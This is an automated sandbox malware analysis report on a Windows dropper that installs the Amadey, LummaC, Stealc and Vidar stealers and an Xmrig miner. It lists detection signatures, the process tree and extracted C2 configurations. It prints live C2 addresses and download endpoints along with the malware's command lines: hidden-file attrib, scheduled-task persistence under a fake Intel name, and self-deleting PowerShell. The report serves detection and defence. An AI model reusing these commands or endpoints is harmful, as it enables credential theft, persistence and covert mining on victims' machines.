Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1579075
MD5:99a7a8ab2463dd70f90e0ab4e0aec4a8
SHA1:b9e2b99b7124d83df3b7cd052231cb35d1d6efcb
SHA256:89601168c7196328f763faf4dd415b041c94f6d5fe5c2b7094d49dba69926a61
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 99A7A8AB2463DD70F90E0AB4E0AEC4A8)
    • skotes.exe (PID: 7596 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 99A7A8AB2463DD70F90E0AB4E0AEC4A8)
  • skotes.exe (PID: 7780 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 99A7A8AB2463DD70F90E0AB4E0AEC4A8)
  • skotes.exe (PID: 7416 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 99A7A8AB2463DD70F90E0AB4E0AEC4A8)
    • c359af6492.exe (PID: 7548 cmdline: "C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 8172 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 8136 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7608 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7512 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1416 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 2996 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1612 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6968 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 2968 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 6508 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 5564 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 7944 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7932 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7952 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7988 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 6940 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • 352def4414.exe (PID: 4020 cmdline: "C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe" MD5: F8D2B32727EAE3B8B27AB03CA770A941)
    • d5cd5e4aa8.exe (PID: 504 cmdline: "C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exe" MD5: 341918EFC0EB0FE89609A7486A9ED04A)
    • ea17d0b77a.exe (PID: 3920 cmdline: "C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe" MD5: D52E2D9DC21C02FA5F8161754B7B6463)
    • 9434b989db.exe (PID: 7128 cmdline: "C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe" MD5: AD87440D4B97E759F9D4EE9D6279D06E)
  • Intel_PTT_EK_Recertification.exe (PID: 6896 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 6432 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 5356 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7136 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
{"C2 url": ["energyaffai.lat", "rapeflowwj.lat", "aspecteirs.lat", "sweepyribs.lat", "necklacebudi.lat", "sustainskelet.lat", "discokeyus.lat", "crosshuaht.lat", "grannyejh.lat"], "Build id": "PsFKDg--pablo"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
00000030.00000003.3334314821.0000000004930000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000030.00000002.4222202528.0000000000F21000.00000040.00000001.01000000.00000013.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000003.00000003.2262477071.0000000004960000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 24 entries
            SourceRuleDescriptionAuthorStrings
            4.2.skotes.exe.f30000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0.2.file.exe.b20000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                3.2.skotes.exe.f30000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                    • 0x325ac8:$x1: donate.ssl.xmrig.com
                    Click to see the 7 entries

                    System Summary

                    barindex
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ea17d0b77a.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7416, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ea17d0b77a.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 5564, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7952, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 5564, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7952, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 5564, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 7988, ProcessName: powershell.exe
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                    Source: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                    Source: ea17d0b77a.exe.3920.47.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "rapeflowwj.lat", "aspecteirs.lat", "sweepyribs.lat", "necklacebudi.lat", "sustainskelet.lat", "discokeyus.lat", "crosshuaht.lat", "grannyejh.lat"], "Build id": "PsFKDg--pablo"}
                    Source: 9434b989db.exe.7128.48.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeReversingLabs: Detection: 87%
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeReversingLabs: Detection: 87%
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 50%
                    Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 69%
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeReversingLabs: Detection: 69%
                    Source: file.exeReversingLabs: Detection: 50%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeJoe Sandbox ML: detected
                    Source: file.exeJoe Sandbox ML: detected
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_5d8799c9-a

                    Bitcoin Miner

                    barindex
                    Source: Yara matchFile source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000028.00000002.3026870349.0000000000847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.3026870349.000000000086B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.3028044780.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.3026870349.0000000000895000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 6896, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6432, type: MEMORYSTR
                    Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                    Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                    Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                    Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_00977978 FindFirstFileW,FindFirstFileW,free,20_2_00977978
                    Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 20_2_0097881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,20_2_0097881C
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                    Source: Malware configuration extractorURLs: energyaffai.lat
                    Source: Malware configuration extractorURLs: rapeflowwj.lat
                    Source: Malware configuration extractorURLs: aspecteirs.lat
                    Source: Malware configuration extractorURLs: sweepyribs.lat
                    Source: Malware configuration extractorURLs: necklacebudi.lat
                    Source: Malware configuration extractorURLs: sustainskelet.lat
                    Source: Malware configuration extractorURLs: discokeyus.lat
                    Source: Malware configuration extractorURLs: crosshuaht.lat
                    Source: Malware configuration extractorURLs: grannyejh.lat
                    Source: Malware configuration extractorIPs: 185.215.113.43
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                    Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2E0C0 recv,recv,recv,recv,0_2_00B2E0C0
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=empNK
                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=empaK
                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/download
                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/download)%N
                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key
                    Source: d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/keybnZ
                    Source: d5cd5e4aa8.exe, 0000002E.00000003.3608285796.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
                    Source: d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download(ho
                    Source: d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download.hi
